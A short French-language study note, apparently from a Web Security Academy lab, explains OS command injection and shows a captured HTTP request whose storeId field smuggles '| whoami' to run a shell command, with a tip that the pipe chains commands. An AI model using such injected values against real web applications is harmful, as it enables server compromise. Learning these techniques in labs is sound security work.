Description
OS command injection aussi connu sous le nom de shell injection. Est une vulnérabilité qui permet à un attaquand d’exécuter des commandes systèmes sur le serveur d’une application web et de ce fait comprommettre les données ainsi que l’application. Il peut utiliser cette injection pour pivoter de ce système pour compromettre les autres systêmes de l’entreprise.
Exemple :
POST /product/stock HTTP/2
Host: 0a9200bd033eaf0f855973ee00a500da.web-security-academy.net
Cookie: session=pHB5rXh0ZHSHJrvAbCGflot5jZS0D5hk
Content-Length: 21
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0a9200bd033eaf0f855973ee00a500da.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a9200bd033eaf0f855973ee00a500da.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
productId=1&storeId=1 | whoamiNB : Separé les commandes avec | pouvoir les exécuter à la chaine